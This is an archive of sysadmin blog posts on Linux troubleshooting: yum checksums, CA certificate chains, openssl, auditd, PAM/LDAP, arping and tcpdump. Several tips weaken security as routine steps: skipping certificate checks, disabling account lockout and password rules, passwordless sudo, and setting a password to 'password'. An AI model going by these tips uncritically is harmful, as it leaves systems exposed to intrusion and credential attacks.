Archive

Archive for the ‘Security’ Category

resolved – yum Error performing checksum Trying other mirror and finally No more mirrors to try

August 27th, 2015 Comments off

Today when I was installing a package on Linux, the error below appeared:

[root@testhost yum.repos.d]# yum list --disablerepo=* --enablerepo=yumpaas
Loaded plugins: rhnplugin, security
This system is not registered with ULN.
ULN support will be disabled.
yumpaas | 2.9 kB 00:00
yumpaas/primary_db | 30 kB 00:00
http://yumrepo.example.com/paas_oel5/repodata/b8e385ebfdd7bed69b7619e63cd82475c8bacc529db7b8c145609b64646d918a-primary.sqlite.bz2: [Errno -3] Error performing checksum
Trying other mirror.
yumpaas/primary_db | 30 kB 00:00
http://yumrepo.example.com/paas_oel5/repodata/b8e385ebfdd7bed69b7619e63cd82475c8bacc529db7b8c145609b64646d918a-primary.sqlite.bz2: [Errno -3] Error performing checksum
Trying other mirror.
Error: failure: repodata/b8e385ebfdd7bed69b7619e63cd82475c8bacc529db7b8c145609b64646d918a-primary.sqlite.bz2 from yumpaas: [Errno 256] No more mirrors to try.

The repo "yumpaas" is hosted on an OEL 6 VM, which by default uses SHA-256 (sha2) checksums in its repo metadata. However, on OEL 5 VMs (like the VM running yum here), yum only understands SHA-1 by default. So I worked around this by installing python-hashlib, which extends yum's capability to handle SHA-256 (python-hashlib comes from the external EPEL repo).

[root@testhost yum.repos.d]# yum install python-hashlib

And after this, the problematic repo could be used. But to resolve this issue permanently, without needing the workaround on every OEL 5 VM, we should recreate the repo with SHA-1 as the checksum algorithm (createrepo -s sha1).
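To see the difference between the two digest formats at a glance, compare the outputs of sha1sum and sha256sum: the repodata filename in the error above embeds a 64-character SHA-256 digest, which stock OEL 5 yum cannot parse, while SHA-1 digests are 40 characters. A minimal illustration:

```shell
# SHA-1 yields a 40-hex-char digest; SHA-256 yields a 64-hex-char one
printf 'hello' | sha1sum     # aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
printf 'hello' | sha256sum   # 2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
```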

resolved – Unable to locally verify the issuer’s authority

August 18th, 2015 Comments off

Today we found the following error in a WebLogic server log:

[2015-08-16 14:38:21,866] [WARN] [N/A] [testhost.example.com] [Thrown exception when ...... javax.net.ssl.SSLHandshakeException: General SSLEngine problem
......
Caused by: javax.net.ssl.SSLHandshakeException: General SSLEngine problem
......
Caused by: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
at sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:323)

We then ran a test on the Linux server:

[root@testhost1 ~]# wget https://testurl.example.com/
--2015-08-17 10:15:56-- https://testurl.example.com/
Resolving testurl.example.com... 192.168.77.230
Connecting to testurl.example.com|192.168.77.230|:443... connected.
ERROR: cannot verify testurl.example.com's certificate, issued by `/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4':
Unable to locally verify the issuer's authority.
To connect to testurl.example.com insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.

And tested using openssl s_client:

[root@testhost ~]# openssl s_client -connect testurl.example.com:443 -showcerts
CONNECTED(00000003)
depth=1 /C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4
verify error:num=2:unable to get issuer certificate
issuer= /C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=(c) 2006 VeriSign, Inc. - For authorized use only/CN=VeriSign Class 3 Public Primary Certification Authority - G5
verify return:0
---
Certificate chain
0 s:/C=US/ST=California/L=Redwood Shores/O=Test Corporation/OU=FOR TESTING PURPOSES ONLY/CN=*.testurl.example.com
i:/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4
-----BEGIN CERTIFICATE-----
MIIFOTCCBCGgAwIBAgIQB1z+1jMRPPv/TrBA2qh5YzANBgkqhkiG9w0BAQsFADB+
MQswCQYDVQQGEwJVUzEdMBsGA
......
-----END CERTIFICATE-----
---
Server certificate
subject=/C=US/ST=California/L=Redwood Shores/O=Test Corporation/OU=FOR TESTING PURPOSES ONLY/CN=*.testurl.example.com
issuer=/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4
---
No client certificate CA names sent
---
SSL handshake has read 1510 bytes and written 447 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 2B5E228E4705C12D7EE7B5C608AE5E3781C5626C1A99A8D60D21DB2350D4F4DE
Session-ID-ctx:
Master-Key: F06632FD67E22EFB1134CDC0EEE8B8B44972747D804D5C7969095FCB2A692E90F111DC4FC6081F4D94C7561BB556DA16
Key-Arg : None
Krb5 Principal: None
Start Time: 1439793731
Timeout : 300 (sec)
Verify return code: 2 (unable to get issuer certificate)
---

From the above, the issue appeared to be caused by missing CA certificates, as the SSL certificate is relatively new and uses SHA-2. So I decided to download the CA certificates from Symantec, both "Symantec Class 3 Secure Server CA - G4" and "VeriSign Class 3 Public Primary Certification Authority - G5".

[root@testhost ~]# wget --no-check-certificate 'http://symantec.tbs-certificats.com/SymantecSSG4.crt'

[root@testhost ~]# openssl version -a|grep OPENSSLDIR

OPENSSLDIR: "/etc/pki/tls"

[root@testhost ~]# cp /etc/pki/tls/certs/ca-bundle.crt /etc/pki/tls/certs/ca-bundle.crt.bak

[root@testhost ~]# openssl x509 -text -in "SymantecSSG4.crt" >> /etc/pki/tls/certs/ca-bundle.crt

Then I tested wget again, but it still failed, now with "unable to get issuer certificate":

[root@testhost1 ~]# wget https://testurl.example.com/
--2015-08-17 10:38:59-- https://testurl.example.com/
Resolving myproxy.example.com... 192.168.19.20
Connecting to myproxy.example.com|192.168.19.20|:80... connected.
ERROR: cannot verify testurl.example.com's certificate, issued by `/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4':
unable to get issuer certificate
To connect to testurl.example.com insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.

Then I installed the other CA certificate indicated in the error output, the G5 root (the G4 step above may not even have been needed):

[root@testhost1 ~]# wget --no-check-certificate 'https://www.symantec.com/content/en/us/enterprise/verisign/roots/VeriSign-Class%203-Public-Primary-Certification-Authority-G5.pem'

[root@testhost1 ~]# openssl x509 -text -in "VeriSign-Class 3-Public-Primary-Certification-Authority-G5.pem" >> /etc/pki/tls/certs/ca-bundle.crt
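You can confirm whether a certificate's issuer is present in a CA file with openssl verify before retrying wget. Here's a self-contained sketch using a throwaway CA (all names are hypothetical):

```shell
# create a throwaway root CA and a leaf certificate signed by it
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
    -subj "/CN=DemoRootCA" -keyout ca.key -out ca.crt
openssl req -newkey rsa:2048 -nodes \
    -subj "/CN=demo.example.com" -keyout leaf.key -out leaf.csr
openssl x509 -req -in leaf.csr -CA ca.crt -CAkey ca.key -set_serial 1 \
    -days 1 -out leaf.crt

# verification succeeds only when the issuer is in the CA file
openssl verify -CAfile ca.crt leaf.crt   # leaf.crt: OK
openssl verify leaf.crt                  # fails: issuer not in the default store
```

The equivalent check against the updated system bundle would be openssl verify -CAfile /etc/pki/tls/certs/ca-bundle.crt server.crt.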

This time, wget verified the certificate and the download succeeded:

[root@testhost1 ~]# wget https://testurl.example.com/
--2015-08-17 10:40:03-- https://testurl.example.com/
Resolving myproxy.example.com... 192.168.19.20
Connecting to myproxy.example.com|192.168.19.20|:80... connected.
Proxy request sent, awaiting response... 200 OK
Length: 11028 (11K) [text/html]
Saving to: `index.html'

100%[======================================>] 11,028 --.-K/s in 0.02s

2015-08-17 10:40:03 (526 KB/s) - `index.html' saved [11028/11028]

PS:
You can check more info here about adding trusted root certificates to the server - Mac OS X / Windows / Linux (Ubuntu, Debian) / Linux (CentOS 6) / Linux (CentOS 5)

resolved – VPN Service not available, The VPN agent service is not responding. Please restart this application after a while.

March 30th, 2015 13 comments

Today when I tried to connect to VPN through Cisco AnyConnect Secure Mobility Client, the following error dialog appeared:

 

VPN Service not available

And after I clicked "OK" button, the following dialog prompted:

The VPN agent service is not responding

Both dialogs complained about the VPN service being unavailable or not responding, so I ran "services.msc" from the Windows Run dialog and found the following:

vpn service

When I checked, the service "Cisco AnyConnect Secure Mobility Agent" was stopped, and its "Startup type" was "Manual". So I changed "Startup type" to "Automatic", clicked "Start", then "OK" to save.

After this, Cisco AnyConnect Secure Mobility Client ran fine and I could connect to the VPN through it.

resolved – error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm

December 17th, 2014 Comments off

Today when I tried using curl to fetch a URL, the following error occurred:

[root@centos-doxer ~]# curl -i --user username:password -H "Content-Type: application/json" -X POST --data @/u01/shared/addcredential.json https://testserver.example.com/actions -v

* About to connect() to testserver.example.com port 443

*   Trying 10.242.11.201... connected

* Connected to testserver.example.com (10.242.11.201) port 443

* successfully set certificate verify locations:

*   CAfile: /etc/pki/tls/certs/ca-bundle.crt

  CApath: none

* SSLv2, Client hello (1):

* SSLv3, TLS handshake, Server hello (2):

* SSLv3, TLS handshake, CERT (11):

* SSLv3, TLS alert, Server hello (2):

error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm

* Closing connection #0

After some searching, I found that it's caused by the installed version of openssl (openssl-0.9.8e) not supporting the SHA-256 signature algorithm. There are a few ways to resolve this:

1. add -k parameter to curl to ignore the SSL error

2. update openssl to "OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008", just try "yum update openssl".

# openssl version
OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008

3. upgrade openssl to at least openssl-0.9.8o by building from source (this may not be needed; try method 2 above first):

wget --no-check-certificate 'https://www.openssl.org/source/old/0.9.x/openssl-0.9.8o.tar.gz'
tar zxvf openssl-0.9.8o.tar.gz
cd openssl-0.9.8o
./config --prefix=/usr --openssldir=/usr/openssl
make
make test
make install

After this, run openssl version to confirm:

[root@centos-doxer openssl-0.9.8o]# /usr/bin/openssl version
OpenSSL 0.9.8o 01 Jun 2010

PS:

If openssl was originally installed from an rpm package, the rpm database will still report the old version even after you build and install the new one from source. This is expected, so don't rely too much on rpm here:

[root@centos-doxer openssl-0.9.8o]# /usr/bin/openssl version
OpenSSL 0.9.8o 01 Jun 2010

Even after rebuilding the rpm DB (rpm --rebuilddb), rpm still reports the old version:

[root@centos-doxer openssl-0.9.8o]# rpm -qf /usr/bin/openssl
openssl-0.9.8e-26.el5_9.1
openssl-0.9.8e-26.el5_9.1

[root@centos-doxer openssl-0.9.8o]# rpm -qa|grep openssl
openssl-0.9.8e-26.el5_9.1
openssl-devel-0.9.8e-26.el5_9.1
openssl-0.9.8e-26.el5_9.1
openssl-devel-0.9.8e-26.el5_9.1

 

resolved – auditd STDERR: Error deleting rule Error sending enable request (Operation not permitted)

September 19th, 2014 Comments off

Today when I tried to restart auditd, the following error message appeared:

[2014-09-18T19:26:41+00:00] ERROR: service[auditd] (cookbook-devops-kernelaudit::default line 14) had an error: Mixlib::ShellOut::ShellCommandFailed: Expected process to exit with [0], but received '1'
---- Begin output of /sbin/service auditd restart ----
STDOUT: Stopping auditd: [  OK  ]
Starting auditd: [FAILED]
STDERR: Error deleting rule (Operation not permitted)
Error sending enable request (Operation not permitted)
---- End output of /sbin/service auditd restart ----
Ran /sbin/service auditd restart returned 1

After some reading of the auditd man page, I realized that when the audit "enabled" flag is set to 2 (locked), any attempt to change the configuration in that mode is audited and denied. That may be the reason for "STDERR: Error deleting rule (Operation not permitted)" and "Error sending enable request (Operation not permitted)". Here's the relevant part from the man page of auditctl:

-e [0..2] Set enabled flag. When 0 is passed, this can be used to temporarily disable auditing. When 1 is passed as an argument, it will enable auditing. To lock the audit configuration so that it can't be changed, pass a 2 as the argument. Locking the configuration is intended to be the last command in audit.rules for anyone wishing this feature to be active. Any attempt to change the configuration in this mode will be audited and denied. The configuration can only be changed by rebooting the machine.

You can run auditctl -s to check the current setting:

[root@centos-doxer ~]# auditctl -s
AUDIT_STATUS: enabled=1 flag=1 pid=3154 rate_limit=0 backlog_limit=320 lost=0 backlog=0

And you can run auditctl -e <0|1|2> to change this attribute on the fly, or add -e <0|1|2> to /etc/audit/audit.rules. Please note that once the configuration has been locked with -e 2, a reboot is required before it can be changed again.
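For example, here's a minimal /etc/audit/audit.rules sketch that keeps the configuration changeable at runtime (the backlog value is just illustrative):

```shell
# /etc/audit/audit.rules (sketch)
-D          # delete all previously loaded rules
-b 320      # kernel audit backlog limit
-e 1        # 1 = auditing on and mutable; 2 = locked until the next reboot
```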

PS:

Here's more about linux audit.

arping in linux for getting MAC address and update ARP caches by broadcast

August 27th, 2014 Comments off

Suppose we want to know the MAC address of 10.182.120.210. We can log on to a Linux host in the same subnet as 10.182.120.210, e.g. 10.182.120.188:

[root@centos-doxer ~]#arping -U -c 3 -I bond0 -s 10.182.120.188 10.182.120.210
ARPING 10.182.120.210 from 10.182.120.188 bond0
Unicast reply from 10.182.120.210 [00:21:CC:B7:1F:EB] 1.397ms
Unicast reply from 10.182.120.210 [00:21:CC:B7:1F:EB] 1.378ms
Sent 3 probes (1 broadcast(s))
Received 2 response(s)

So 00:21:CC:B7:1F:EB is the MAC address of 10.182.120.210. And from this we can also see that the IP address 10.182.120.210 is currently in use on the local network.

Another use of arping is to update ARP caches. One scenario: you assign a new machine an IP address that is already in use, and then you can no longer log on to the old machine at that IP. Even after you shut down the new machine, you may still be unable to reach the old one. Here's the resolution:

Suppose we have configured eth0 on the new machine with IP address 192.168.0.2, which is already used by an old machine. Log on to the new machine and run the following commands:

arping -A 192.168.0.2 -I eth0 192.168.0.2
arping -U -s 192.168.0.2 -I eth0 192.168.0.1 #this is sending ARP broadcast, and 192.168.0.1 is the gateway address.
/sbin/arping -I eth0 -c 3 -s 192.168.0.2 192.168.0.3 #update neighbours' ARP caches

PS:

  1. You can run 'arp -nae'(linux) or 'arp -a'(windows) to get arp table.
  2. Here is more about ARP spoofing prevention (in Chinese: static binding/ARP firewall/small VLAN/PPPoE/immune network).
  3. Here is about Proxy ARP(join broadcast LAN with serial link on router).

tcpdump & wireshark tips

March 13th, 2014 Comments off

tcpdump [ -AdDefIKlLnNOpqRStuUvxX ] [ -B buffer_size ] [ -c count ]

[ -C file_size ] [ -G rotate_seconds ] [ -F file ]
[ -i interface ] [ -m module ] [ -M secret ]
[ -r file ] [ -s snaplen ] [ -T type ] [ -w file ]
[ -W filecount ]
[ -E spi@ipaddr algo:secret,... ]
[ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ expression ]

#general format of a tcp protocol line

src > dst: flags data-seqno ack window urgent options
Src and dst are the source and destination IP addresses and ports.
Flags are some combination of S (SYN), F (FIN), P (PUSH), R (RST), W (ECN CWR) or E (ECN-Echo), or a single '.'(means no flags were set)
Data-seqno describes the portion of sequence space covered by the data in this packet.
Ack is sequence number of the next data expected the other direction on this connection.
Window is the number of bytes of receive buffer space available the other direction on this connection.
Urg indicates there is 'urgent' data in the packet.
Options are tcp options enclosed in angle brackets (e.g., <mss 1024>).

tcpdump -D #list of the network interfaces available
tcpdump -e #Print the link-level header on each dump line
tcpdump -S #Print absolute, rather than relative, TCP sequence numbers
tcpdump -s <snaplen> #Snarf snaplen bytes of data from each packet rather than the default of 65535 bytes
tcpdump -i eth0 -S -nn -XX vlan
tcpdump -i eth0 -S -nn -XX arp
tcpdump -i bond0 -S -nn -vvv udp dst port 53
tcpdump -i bond0 -S -nn -vvv host testhost
tcpdump -nn -S -vvv "dst host host1.example.com and (dst port 1521 or dst port 6200)"

tcpdump -vv -x -X -s 1500 -i eth0 'port 25' #traffic on SMTP. -xX to print data in addition to header in both hex/ASCII. use -s 192 to watch NFS traffic(NFS requests are very large and much of the detail won't be printed unless snaplen is increased).

tcpdump -nn -S udp dst port 111 #note that telnet is based on TCP, NOT UDP. So if you want to test a UDP connection (UDP is connectionless), you must start the app first, then use tcpdump to check the traffic.

tcpdump -nn -S udp dst portrange 1-1023

Wireshark Capture Filters (in Capture -> Options)

Wireshark DisplayFilters (in toolbar)

 

EVENT DIAGRAM
  1. Host A sends a TCP SYNchronize packet to Host B
  2. Host B receives A's SYN
  3. Host B sends a SYNchronize-ACKnowledgement
  4. Host A receives B's SYN-ACK
  5. Host A sends an ACKnowledge
  6. Host B receives the ACK.

TCP socket connection is ESTABLISHED.

3-way-handshake
TCP Three Way Handshake
(SYN,SYN-ACK,ACK)

TCP-CLOSE_WAIT

 

The upper part shows the states on the end-point initiating the termination.

The lower part the states on the other end-point.

So the initiating end-point (i.e. the client) sends a termination request to the server and waits for an acknowledgement in state FIN-WAIT-1. The server sends an acknowledgement and goes in state CLOSE_WAIT. The client goes into FIN-WAIT-2 when the acknowledgement is received and waits for an active close. When the server actively sends its own termination request, it goes into LAST-ACK and waits for an acknowledgement from the client. When the client receives the termination request from the server, it sends an acknowledgement and goes into TIME_WAIT and after some time into CLOSED. The server goes into CLOSED state once it receives the acknowledgement from the client.

A socket can stay in CLOSE_WAIT state indefinitely until the application closes it. Faulty scenarios include file descriptor leaks or a server never executing close() on the socket, leading to a pile-up of CLOSE_WAIT sockets. At the Java level, this manifests as a "Too many open files" error. This value cannot be changed.

TIME_WAIT is just a time-based wait on a socket before the connection is torn down permanently. Under most circumstances, sockets in TIME_WAIT are nothing to worry about. The wait interval can be tuned on some platforms (tcp_time_wait_interval on Solaris).

More info about time_wait & close_wait can be found here.
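A quick way to count sockets per TCP state when hunting CLOSE_WAIT or TIME_WAIT pile-ups (ss comes from iproute2; netstat -atn works similarly on older boxes):

```shell
# tally TCP sockets by state; a large CLOSE-WAIT count usually points at
# an application that never calls close() on its sockets
ss -tan | awk 'NR>1 {print $1}' | sort | uniq -c | sort -rn
```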

PS:

You can refer to this article for a detailed explanation of tcp three-way handshake establishing/terminating a connection. And for tcpdump one, you can check below:

[root@host2 ~]# telnet host1 14100
Trying 10.240.249.139...
Connected to host1.us.oracle.com (10.240.249.139).
Escape character is '^]'.
^]
telnet> quit
Connection closed.

[root@host1 ~]# tcpdump -vvv -S host host2
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
03:16:39.188951 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: TCP (6), length: 60) host1.us.oracle.com.14100 > host2.us.oracle.com.18890: S, cksum 0xa806 (correct), 3445765853:3445765853(0) ack 3946095098 win 5792 <mss 1460,sackOK,timestamp 854077220 860674218,nop,wscale 7> #2. host1 acks host2's SYN with the received sequence number plus 1 (ack 3946095098), and sends its own SYN (seq 3445765853).
03:16:41.233807 IP (tos 0x0, ttl 64, id 6650, offset 0, flags [DF], proto: TCP (6), length: 52) host1.us.oracle.com.14100 > host2.us.oracle.com.18890: F, cksum 0xdd48 (correct), 3445765854:3445765854(0) ack 3946095099 win 46 <nop,nop,timestamp 854079265 860676263> #5. host1 acks host2's FIN (ack 3946095099), then sends its own FIN (seq 3445765854 unchanged).

[root@host2 ~]# tcpdump -vvv -S host host1
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
03:16:39.188628 IP (tos 0x10, ttl 64, id 31059, offset 0, flags [DF], proto: TCP (6), length: 60) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: S, cksum 0x265b (correct), 3946095097:3946095097(0) win 5792 <mss 1460,sackOK,timestamp 860674218 854045985,nop,wscale 7> #1. host2 sends a SYN packet to host1 (seq 3946095097)
03:16:39.188803 IP (tos 0x10, ttl 64, id 31060, offset 0, flags [DF], proto: TCP (6), length: 52) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: ., cksum 0xed44 (correct), 3946095098:3946095098(0) ack 3445765854 win 46 <nop,nop,timestamp 860674218 854077220> #3. host2 acks host1's SYN with the received sequence number plus 1 (ack 3445765854); the TCP connection is now established (its own seq 3946095098 unchanged).
03:16:41.233397 IP (tos 0x10, ttl 64, id 31061, offset 0, flags [DF], proto: TCP (6), length: 52) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: F, cksum 0xe546 (correct), 3946095098:3946095098(0) ack 3445765854 win 46 <nop,nop,timestamp 860676263 854077220> #4. host2 sends a FIN with an ACK; the FIN tells host1 that no more data needs to be sent (seq 3946095098 unchanged), and the ack identifies the previously established connection (ack 3445765854 unchanged)
03:16:41.233633 IP (tos 0x10, ttl 64, id 31062, offset 0, flags [DF], proto: TCP (6), length: 52) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: ., cksum 0xdd48 (correct), 3946095099:3946095099(0) ack 3445765855 win 46 <nop,nop,timestamp 860676263 854079265> #6. host2 acks host1's FIN with its sequence number plus 1 (ack 3445765855); its own seq (3946095099) is unchanged.

VLAN in windows hyper-v

November 26th, 2013 Comments off

Briefly, a virtual LAN (VLAN) can be regarded as a broadcast domain. It operates on OSI network layer 2. The exact protocol definition is known as 802.1Q. Each network packet belonging to a VLAN has an identifier. This is just a number between 0 and 4095, with both 0 and 4095 reserved for other uses. Let's assume a VLAN with an identifier of 10. A NIC configured with the VLAN ID of 10 will pick up network packets with the same ID and will ignore all other IDs. The point of VLANs is that switches and routers enabled for 802.1Q can present VLANs to different switch ports in the network. In other words, where a normal IP subnet is limited to a set of ports on a physical switch, a subnet defined in a VLAN can be present on any switch port, if so configured, of course.

Getting back to the VLAN functionality in Hyper-V: both virtual switches and virtual NICs
can detect and use VLAN IDs. Both can accept and reject network packets based on VLAN ID,
which means that the VM does not have to do it itself. The use of VLAN enables Hyper-V to
participate in more advanced network designs. One limitation in the current implementation is
that a virtual switch can have just one VLAN ID, although that should not matter too much in
practice. The default setting is to accept all VLAN IDs.

resolved – sshd: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=

November 20th, 2013 Comments off

Today when I tried to log on to a Linux server with a normal account, the following errors appeared in /var/log/secure:

Nov 20 07:43:39 test_linux sshd[11200]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.182.120.188 user=testuser
Nov 20 07:43:39 test_linux sshd[11200]: pam_ldap: error trying to bind (Invalid credentials)
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldaps://test.com:7501: Invalid credentials
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldap://test.com: Invalid credentials
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: could not search LDAP server - Server is unavailable
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldaps://test.com:7501: Invalid credentials
Nov 20 07:43:43 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldap://test.com: Invalid credentials
Nov 20 07:43:43 test_linux sshd[11200]: nss_ldap: could not search LDAP server - Server is unavailable
Nov 20 07:43:55 test_linux sshd[11200]: pam_ldap: error trying to bind (Invalid credentials)
Nov 20 07:43:55 test_linux sshd[11200]: Failed password for testuser from 10.182.120.188 port 34243 ssh2
Nov 20 07:43:55 test_linux sshd[11201]: fatal: Access denied for user testuser by PAM account configuration

After some attempts with Linux PAM (sshd, system-auth), I still got nothing. Later, I compared /etc/ldap.conf with the one on another box, and found that the configuration on the problematic host was wrong.

I copied over the correct ldap.conf, tried logging on again, and the issue was resolved.
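For reference, the settings that usually matter in /etc/ldap.conf are the server URIs and the bind credentials; a wrong binddn/bindpw produces exactly the "Invalid credentials" bind errors shown above. A sketch with hypothetical values:

```shell
# /etc/ldap.conf (sketch; all values hypothetical)
uri ldaps://test.com:7501 ldap://test.com
base dc=example,dc=com
binddn cn=proxyuser,dc=example,dc=com   # account used for the directory bind
bindpw secret                           # must match, or bind fails with "Invalid credentials"
ssl on
tls_cacertfile /etc/pki/tls/certs/ca-bundle.crt
```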

PS:

You can read more about Linux PAM here: http://www.linux-pam.org/Linux-PAM-html/ (I recommend reading the System Administrators' Guide, as that is the part most Linux administrators will actually need. You can also find detailed info there on some commonly used PAM modules such as pam_tally2.so, pam_unix.so, pam_cracklib, etc.)

Here's one configuration in /etc/pam.d/sshd:

#%PAM-1.0
auth required pam_tally2.so deny=3 onerr=fail unlock_time=1200 #lock account after 3 failed logins. The accounts will be automatically unlocked after 20 minutes
auth include system-auth
account required pam_nologin.so
account include system-auth
password include system-auth
session optional pam_keyinit.so force revoke
session include system-auth
session required pam_loginuid.so

And here is from /etc/pam.d/system-auth:

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required pam_env.so
auth required pam_tally2.so onerr=fail deny=3 audit silent
#auth required pam_tally2.so onerr=fail deny=3 unlock_time=300 audit silent
auth sufficient pam_fprintd.so
auth sufficient pam_unix.so try_first_pass
auth requisite pam_succeed_if.so uid >= 500 quiet
auth required pam_deny.so

account required pam_tally2.so onerr=fail
account required pam_unix.so
account sufficient pam_localuser.so
account sufficient pam_succeed_if.so uid < 500 quiet
account required pam_permit.so

#password required pam_cracklib.so retry=3 minlen=14 dcredit=-1 ucredit=-1 ocredit=-1 lcredit=-1 difok=3 enforce_for_root
password sufficient pam_unix.so sha512 shadow try_first_pass remember=5
#password sufficient pam_unix.so sha512 shadow try_first_pass use_authtok remember=5
password required pam_deny.so

session optional pam_keyinit.so revoke
session required pam_limits.so
session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid
session required pam_unix.so

You'll get the error message "pam_tally2(sshd:auth): user test (502) tally 4, deny 3" in /var/log/secure when you try to log on after the third time you entered a wrong password. And "pam_tally2 --user test" will show 0 failures after 20 minutes, as configured. You can run pam_tally2 --user test --reset to reset the counter to 0.

You can disable pam_tally2 entirely with the commands below:

grep pam_tally2 /etc/pam.d/{sshd,login,system-auth}
cp /etc/pam.d/sshd /etc/pam.d/sshd.bak;cp /etc/pam.d/login /etc/pam.d/login.bak;cp /etc/pam.d/system-auth /etc/pam.d/system-auth.bak

sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/sshd;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/login;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/system-auth;

 

make sudo asking for no password on linux

November 1st, 2013 Comments off

Assume you have a user named 'test' who belongs to the 'admin' group, and you want user test to be able to sudo to root without Linux prompting for a password. Here's how to do it:

cp /etc/sudoers{,.bak}
sed -i '/%admin/ s/^/# /' /etc/sudoers
echo '%admin ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
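A syntax error in /etc/sudoers can lock you out of sudo entirely, so a safer variant is to draft the rule in a temp file and syntax-check it with visudo -c before installing it as a drop-in (the drop-in filename is arbitrary; /etc/sudoers.d must be enabled via #includedir, which it is on most modern distros):

```shell
# draft the rule in a temp file and syntax-check it with visudo
cat > /tmp/90-admin-nopasswd <<'EOF'
%admin ALL=(ALL) NOPASSWD: ALL
EOF
visudo -cf /tmp/90-admin-nopasswd   # prints "parsed OK" on success
# then install it, e.g.: install -m 440 /tmp/90-admin-nopasswd /etc/sudoers.d/
```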

Enjoy!

disable linux strong password policy

November 1st, 2013 Comments off

You may have enabled a strong password policy for Linux, and of course you can disable it again. Here's the way to do that:

egrep 'pam_cracklib.so|use_authtok|enforce=' /etc/pam.d/system-auth

/bin/cp /etc/pam.d/system-auth{,.bak}
sed -i '/pam_cracklib.so/ s/^/# /' /etc/pam.d/system-auth
sed -i 's/use_authtok//' /etc/pam.d/system-auth

sed -i 's/enforce=everyone/enforce=none/g' /etc/pam.d/system-auth
echo "password" | passwd --stdin username

PS:

  1. To enable strong password for linux, you can have a try on this http://goo.gl/uwdbN
  2. You can read more about linux pam here http://www.linux-pam.org/Linux-PAM-html/
  3. You can also disable pam_tally2 for not locking user accounts after several times of login failures. You can read this article for more info:

grep pam_tally2 /etc/pam.d/{sshd,login,system-auth}
/bin/cp /etc/pam.d/sshd /etc/pam.d/sshd.bak;/bin/cp /etc/pam.d/login /etc/pam.d/login.bak;/bin/cp /etc/pam.d/system-auth /etc/pam.d/system-auth.bak

sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/sshd;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/login;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/system-auth;

tcp flags explanation in details – SYN ACK FIN RST URG PSH and iptables for sync flood

October 11th, 2013 Comments off

This is from wikipedia:

To establish a connection, TCP uses a three-way handshake. Before a client attempts to connect with a server, the server must first bind to and listen at a port to open it up for connections: this is called a passive open. Once the passive open is established, a client may initiate an active open. To establish a connection, the three-way (or 3-step) handshake occurs:

  1. SYN: The active open is performed by the client sending a SYN to the server. The client sets the segment's sequence number to a random value A.
  2. SYN-ACK: In response, the server replies with a SYN-ACK. The acknowledgment number is set to one more than the received sequence number i.e. A+1, and the sequence number that the server chooses for the packet is another random number, B.
  3. ACK: Finally, the client sends an ACK back to the server. The sequence number is set to the received acknowledgement value i.e. A+1, and the acknowledgement number is set to one more than the received sequence number i.e. B+1.

At this point, both the client and server have received an acknowledgment of the connection. The steps 1, 2 establish the connection parameter (sequence number) for one direction and it is acknowledged. The steps 2, 3 establish the connection parameter (sequence number) for the other direction and it is acknowledged. With these, a full-duplex communication is established.
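The flags above live in byte 13 of the TCP header: SYN is 0x02 and ACK is 0x10, so the step-2 SYN-ACK segment carries 0x12. A small sketch of the flag arithmetic:

```shell
# TCP flag bits in header byte 13: FIN=0x01 SYN=0x02 RST=0x04 PSH=0x08 ACK=0x10 URG=0x20
printf '%#x\n' $(( 0x02 | 0x10 ))   # SYN|ACK -> prints 0x12
```

So a capture filter like `tcpdump -nn 'tcp[tcpflags] & tcp-syn != 0'` (run as root) shows just handshake steps 1 and 2.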

